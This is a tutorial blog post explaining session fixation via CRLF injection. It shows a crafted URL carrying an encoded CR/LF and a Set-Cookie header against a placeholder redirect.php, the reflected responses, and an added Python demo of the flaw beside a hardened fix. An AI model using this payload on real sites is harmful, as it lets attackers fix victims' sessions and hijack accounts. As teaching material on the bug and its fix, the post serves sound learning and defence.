How to do session fixation with HTTP header injection


Hi guys, do these terms look unfamiliar? OK, I will make them clear as far as I know. The web works on server-client communication, where the server serves the request made by the client, who is also the end user.

So, to carry on an acknowledged conversation between the server and the client, HTTP headers come in. HTTP headers allow the client or the server to pass extra information along with the request and the response.

What is session fixation?

Whenever the client makes a request to the server, the response comes back with a session ID, which is unique for each user of the website. This session ID is set by the server for the client for a specific duration of time. It can be stored as a cookie, in a form field or in a URL.

A cookie is nothing but a small text file that the web server sends to the user's browser, which stores it temporarily for the session or permanently. It is used to remember the user's preferences for that particular website. So, by setting this session ID ourselves, without the server knowing, we can fix the user's session by sending them a modified URL with the session ID in it.

This is a major vulnerability in a website if it lets user input end up in a header and does not filter unwanted characters. This kind of session fixation is done with the help of CRLF injection, also called HTTP response splitting.

CRLF injection: (Carriage Return and Line Feed, the new-line characters)

Whenever you type something in a text editor and hit Enter, your cursor moves on to the next line, right? How does it know where the end of the line is, or how to return to the beginning of the line?

Yeah, you guessed right: this behaviour comes from the carriage return and line feed characters. Now we are going to use this CRLF injection against the HTTP response of the web server. The reason for using this injection will become clear in the explanation below.

Now let's take a closer look at the website's response to a normal request like this:

https://www.sitename.com/redirect.php?origin=normal

And after sending the request you will get an HTTP response like this:

HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 11:01:23 GMT
Origin: normal
Content-Type: text/html
Connection: close
Server: cloudflare-nginx
CF-RAY: aefuehif3252biuggr-ABM

This is how a normal HTTP response header looks. Noticed something here? The value of the origin parameter is reflected in the HTTP response as the Origin header. So this is the one place where we can influence the HTTP headers: by crafting the URL we can change the normal HTTP response. The main objective is to modify the origin parameter with the help of CRLF injection so that it brings a real change to the response headers.

Okay, now let's craft the URL to add a custom session ID to the HTTP response headers.

https://www.sitename.com/redirect.php?origin=set-cookie:SessionID=hacked

Hit Enter and look at the response now:

HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 11:01:23 GMT
Origin: Set-Cookie: SessionID=hacked
Content-Type: text/html
Connection: close
Server: cloudflare-nginx
CF-RAY: aefuehif3252biuggr-ABM

Oops! Why did we get the custom header on the same line as the Origin header? Sorry folks, we missed the whole point of CRLF injection here: nothing told the server to start a new line. Let us craft the URL again, this time with an encoded carriage return (%0d) and line feed (%0a) in front of our header:

https://www.sitename.com/redirect.php?origin=done%0d%0aset-cookie:SessionID=hacked

Yes, we made it. Now let's look at the response once again, hoping for a good result:

HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 11:01:23 GMT
Origin: done
Set-Cookie: SessionID=hacked
Content-Type: text/html
Connection: close
Server: cloudflare-nginx
CF-RAY: aefuehif3252biuggr-ABM

Yes guys, we added a custom header to the response of the web server. So, when the crafted URL is sent to the victim and they load it, the cookie with the session ID "hacked" is stored in their browser, and this is what we call a session fixation attack.
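To make the bug concrete from the defender's side, here is an added Python example (not code from the original post) that reproduces the redirect.php reflection shown above as a tiny vulnerable handler, puts a hardened version beside it that refuses control characters in header values, and parses both responses the way a browser would. The URLs, header names and function names are assumptions taken from the walkthrough.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample URLs, copied from the walkthrough above: a normal request and the CRLF one.
NORMAL_URL = "https://www.sitename.com/redirect.php?origin=normal"
CRLF_URL = "https://www.sitename.com/redirect.php?origin=done%0d%0aset-cookie:SessionID=hacked"


def origin_param(url: str) -> str:
    """Return the percent-decoded 'origin' query parameter, as redirect.php would see it."""
    return parse_qs(urlsplit(url).query).get("origin", [""])[0]


def vulnerable_response(url: str) -> bytes:
    """The bug from the post: the parameter is copied straight into a response header."""
    return (
        "HTTP/1.1 200 OK\r\n"
        f"Origin: {origin_param(url)}\r\n"  # a CR/LF inside the value ends this header early
        "Content-Type: text/html\r\n\r\n"
    ).encode()


def safe_header_value(value: str) -> str:
    """Hardened version: refuse CR, LF and every other control character instead of echoing it."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        raise ValueError("control characters are not allowed in header values")
    return value


def hardened_response(url: str) -> bytes:
    """Same handler, but a value that would split the response is rejected with a 400."""
    try:
        origin = safe_header_value(origin_param(url))
    except ValueError:
        return b"HTTP/1.1 400 Bad Request\r\nContent-Type: text/plain\r\n\r\n"
    return f"HTTP/1.1 200 OK\r\nOrigin: {origin}\r\nContent-Type: text/html\r\n\r\n".encode()


def parse_headers(raw: bytes):
    """Split the response on CRLF the way a browser does; returns (status line, {name: value})."""
    status, *lines = raw.split(b"\r\n\r\n", 1)[0].decode().split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


if __name__ == "__main__":
    for handler in (vulnerable_response, hardened_response):
        status, headers = parse_headers(handler(CRLF_URL))
        print(handler.__name__, status, "Set-Cookie injected:", "set-cookie" in headers)
```

Most modern HTTP libraries and frameworks already refuse CR and LF in header values, so the vulnerable handler builds its response bytes by hand on purpose; the check in safe_header_value is the one to look for when reviewing code that still assembles headers itself.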
